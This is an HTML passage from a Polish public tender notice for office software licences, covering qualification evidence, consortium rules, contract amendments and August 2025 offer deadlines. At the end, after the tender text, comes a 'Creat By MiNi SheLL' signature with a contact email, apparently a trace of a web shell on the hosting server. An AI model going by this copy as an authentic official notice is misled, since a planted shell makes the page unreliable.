Zamawiający uzna za spełniony warunek, jeżeli w ramach tych dostaw, wartość dostaw licencji na oprogramowanie biurowe dla użytkowników wynosiła minimum 200.000 zł brutto (słownie: dwieście tysięcy złotych) <br/><br/>Uwaga nr 2<br/>W przypadku wykazania się w zakresie zdolności technicznej doświadczeniem w walucie innej niż PLN, przeliczenie wartości nastąpi po średnim kursie ogłoszonym przez NBP w dniu opublikowania ogłoszenia o zamówieniu w niniejszym postępowaniu. <br/><br/>Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia o spełnianiu warunków udziału oraz wykazu dostaw według formuły spełnia / nie spełnia. <br/><br/>7.2.	Wartości podane w dokumentach potwierdzających spełnianie warunku, w walutach innych niż wskazane przez Zamawiającego, Wykonawca przeliczy według średniego kursu NBP na dzień podpisania protokołu odbioru lub równoważnego dokumentu wskazujące należyte wykonanie dostawy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie w sprawie<br/>wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2024 r. poz. 507).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">8.4.	Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>8.4.1.	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>8.4.2.	wykaz dostaw stanowiących przedmiot zamówienia, o których mowa w punkcie 7.1.2. lit. (d) wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych, także gdy są nadal wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy potwierdzające fakt, że dostawy są należycie wykonywane; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy – wzór stanowi Załącznik nr 5 do SWZ;<br/>8.5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w pkt 8.4.1., składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/>8.6.	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8.4.1, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i do<br/>zawarcia umowy ramowej w sprawie zamówienia publicznego. Uwaga: spółka cywilna jest traktowana jako Wykonawcy<br/>ubiegający się wspólnie. Przed udzieleniem zamówienia Zamawiający uprawniony jest do żądania przedłożenia zawartej<br/>umowy regulującej zasady współpracy wykonawców wspólnie składających ofertę (tj. umowę konsorcjum, umowę spółki<br/>cywilnej).<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt 7.1.1<br/>SWZ składa osobno każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia osobno każdego z<br/>Wykonawców oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub kryteriów selekcji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany i uzupełnienia Umowy wymagają formy pisemnej pod rygorem nieważności, o ile w Umowie nie określono inaczej.<br/>2.	Zamawiający przewiduje możliwość dokonania zmian Umowy, o których mowa w np. 455 ust. 1 pkt 1 Ustawy p.z.p, które mogą dotyczyć w szczególności następujących sytuacji: <br/>a)	zmiana postanowień Umowy w przypadku zmiany przepisów prawnych istotnych / mających bezpośrednie znacznie dla realizacji przedmiotu Umowy,<br/>b)	konieczności zmiany sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego oraz niezbędna w celu prawidłowego wykonania Umowy.<br/>3.	Strony dopuszczają możliwość dokonania zmian w Umowie na warunkach określonych w niniejszym paragrafie, gdy zmiany te nie stanowią zmian istotnych w rozumieniu art. 454 ustawy Prawo zamówień publicznych oraz w oparciu o przesłanki określone w przepisach art. 455 ust. 1-4 ustawy Prawo zamówień publicznych. Wystąpienie którejkolwiek z okoliczności stanowiących podstawę do zmiany Umowy nie stanowi o obowiązku Stron do wprowadzenia tej zmiany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pisf</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-12 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wymaga dostarczenia oraz aktywacji Licencji, poprzez ich przypisanie do kont wskazanych przez Zamawiającego, w dniu 13 października 2025 r.<br/><br/>CIĄG DALSZY ZAPISÓW Z SEKCJI 3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:<br/><br/>...(Dz.U.2020.2415), należy złożyć w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>11.	Wyjaśnienia i uzupełnienia na wezwanie Zamawiającego, Wykonawca jest zobowiązany doręczyć Zamawiającemu przed upływem terminu wskazanego w wezwaniu do wyjaśnień lub uzupełnień w formie elektronicznej, w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>12.	Dokumenty lub oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>13.	Wykonawca ma obowiązek podać Zamawiającemu swój adres poczty elektronicznej (email).

Creat By MiNi SheLL
Email: jattceo@gmail.com